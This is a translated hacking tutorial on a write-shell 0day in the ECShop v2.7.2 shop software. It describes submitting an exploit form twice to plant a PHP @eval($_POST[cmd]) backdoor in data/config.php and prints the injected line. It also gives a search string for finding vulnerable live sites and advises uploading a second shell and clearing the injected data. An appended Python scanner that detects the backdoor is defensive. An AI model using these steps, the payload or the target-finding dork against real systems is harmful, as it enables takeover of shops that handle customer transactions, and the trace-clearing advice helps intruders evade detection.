An instant-kill front-end write-shell 0day in ECShop

Source: Internet
Author: User
Tags: phpinfo

ECShop is known as the largest open-source online shop system. Its official introduction reads: "The ECShop online shop system is a set of free, open-source web store software that, in stability, code optimization, operating efficiency, load capacity, security level, functional controllability and rigour of permissions, holds a leading position among similar products at home and abroad."

In my understanding, an online shop system should put security in a very important position, but ECShop seems to be full of holes. Just a few days ago the expert xhming published an ECShop front-end write-shell 0day; using the vulnerability to get a shell is very simple and can be described as an instant kill. The vulnerability is also present in the latest version available for official download, and no patch or updated release has been issued yet.

For me, a new ECShop vulnerability is a good thing, because it gives me a hole through which to take a shell, haha. I also hope that, spurred on by vulnerability research, ECShop will become safer and better; after all, an online shop system handles online transactions, and that is no joke.

I. Introduction to the vulnerability

The vulnerable file is index.php in the demo directory; I will not post the code here!

For a detailed description of the vulnerability, see the original source of the vulnerability.

II. How to exploit the vulnerability

I will not go into the specific vulnerability analysis, but go straight to how this hole is exploited to get a shell. The latest version of ECShop at the time of writing is the one I, Dangerous Stroll, downloaded from the official site, the GBK build ECShop_V2.7.2_GBK_Release0604, which I installed in a PHP environment on a virtual machine.

In a forum post xhming gives an exploit: an HTML file that submits data to the site. After submitting it twice, opening demo/index.php shows the output of phpinfo(). xhming notes that the submitted content can be constructed freely, the implication being that you can construct a submission that writes a shell directly rather than the symbolic phpinfo() call. But not everyone can construct a submission that gets a shell directly; fortunately MR.LP modified xhming's exploit and released a version that gets a shell directly.

How to use it:

1. Change the contents of the form's action to the required URL.

2. Submit the form once.

3. Connect with a one-line PHP trojan client; the password is cmd.

I saved the above code as exp.html. Opened directly it showed garbled characters, but changing "charset=utf-8" to "charset=gbk" solved the garbling problem.

I opened exp.html in Notepad, changed the submission address to the address of the ECShop install on my virtual machine, saved it, opened exp.html and clicked the "Submit" button. The result page showed that the one-line PHP trojan had been written to config.php in the data directory, but when I connected with lanker's one-line PHP backdoor client using the password cmd, the trojan could not be used.

On the result page I pressed the browser's Back button to return to exp.html and clicked "Submit" again to resubmit the data. After the second submission, connecting with lanker's one-line PHP backdoor client got the shell.

Note that the form originally had to be submitted twice to get the shell.

Comparing the original config.php in the data directory with the config.php after getting the shell, I found that the two submissions had written the following into config.php: define('EC_LANGUAGE', ''); @eval($_POST[cmd]); #'); @eval($_POST[cmd]); #');. It is recommended to use the obtained shell to upload another shell, then remove the newly written data from config.php.
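As an added defensive check that is not part of the original article: a small Python scanner that inspects an ECShop install's data/config.php for the injected one-line @eval($_POST[...]) backdoor described above and reports whether the vulnerable demo/index.php is still present. The paths are taken from the article; the sample config contents and the install root are constructed for illustration.

```python
import re
from pathlib import Path

# Shape of the one-line PHP backdoor the article says ends up in data/config.php:
# eval() fed directly from a request variable (POST, GET or REQUEST).
BACKDOOR_RE = re.compile(r"@?\s*eval\s*\(\s*\$_(POST|GET|REQUEST)\s*\[", re.IGNORECASE)

# A legitimate config line holds exactly one define(); code following the closing
# ");" on the same line is the injection shape shown in the article.
DEFINE_TAIL_RE = re.compile(r"define\s*\(\s*'EC_LANGUAGE'.*?\)\s*;\s*\S", re.IGNORECASE)


def scan_config(text: str) -> list[str]:
    """Return one finding per suspicious line in the contents of config.php."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if BACKDOOR_RE.search(line):
            findings.append(f"line {lineno}: eval() executes request input")
        elif DEFINE_TAIL_RE.search(line):
            findings.append(f"line {lineno}: trailing code after define('EC_LANGUAGE')")
    return findings


def check_install(root: str) -> dict:
    """Check an ECShop web root: is demo/index.php still deployed, is config.php clean?"""
    root_path = Path(root)
    # The article names demo/index.php as the vulnerable file; a production
    # install that still ships it remains exposed until the official patch lands.
    demo_present = (root_path / "demo" / "index.php").is_file()
    config = root_path / "data" / "config.php"
    findings = []
    if config.is_file():
        findings = scan_config(config.read_text(encoding="utf-8", errors="replace"))
    return {"demo_present": demo_present, "config_findings": findings}


# Constructed samples: a clean config line, and the line as the article reports it
# after the two submissions (the define() is cut short and a backdoor appended).
CLEAN_CONFIG = "<?php\ndefine('EC_LANGUAGE', 'zh_cn');\n$db_host = 'localhost';\n"
INFECTED_CONFIG = (
    "<?php\n"
    "define('EC_LANGUAGE', ''); @eval($_POST[cmd]); #'); @eval($_POST[cmd]); #');\n"
    "$db_host = 'localhost';\n"
)

if __name__ == "__main__":
    print("clean   :", scan_config(CLEAN_CONFIG))
    print("infected:", scan_config(INFECTED_CONFIG))
    print(check_install("/var/www/ecshop"))  # constructed path; adjust to your web root
```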

You can find websites with this vulnerability by searching for "Powered by ECShop v2.7.2". That is Dangerous Stroll's introduction to the ECShop front-end write-shell 0day. Friends who run their own ECShop sites should apply the official patch for this vulnerability as soon as it is released; the vulnerability is very serious. The exploit is very simple: write in the target site's address, click the "Submit" button twice, and you get a shell, so sites with the vulnerability are an instant kill. I hope that those who use this vulnerability to get a shell do not damage the site, and it would be even better if you could learn the cause of the vulnerability and the methods and ideas behind exploiting it.
